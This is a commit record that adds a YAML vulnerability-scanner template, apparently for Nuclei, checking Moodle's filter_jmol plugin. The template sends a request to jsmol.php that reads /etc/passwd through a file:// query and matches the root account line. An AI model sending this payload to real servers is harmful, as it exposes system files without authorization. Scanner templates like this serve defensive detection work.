Create Moodle filter_jmol multiple vulnerabilities.yaml

patch-1
SaN ThosH 2020-04-08 18:17:16 +05:30 committed by GitHub
parent be72ce2889
commit f5eddff072
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 0 deletions

View File

@ -0,0 +1,19 @@
id: Moodle filter_jmol multiple vulnerabilities
info:
name: Moodle filter_jmol multiple vulnerabilities
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd"
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body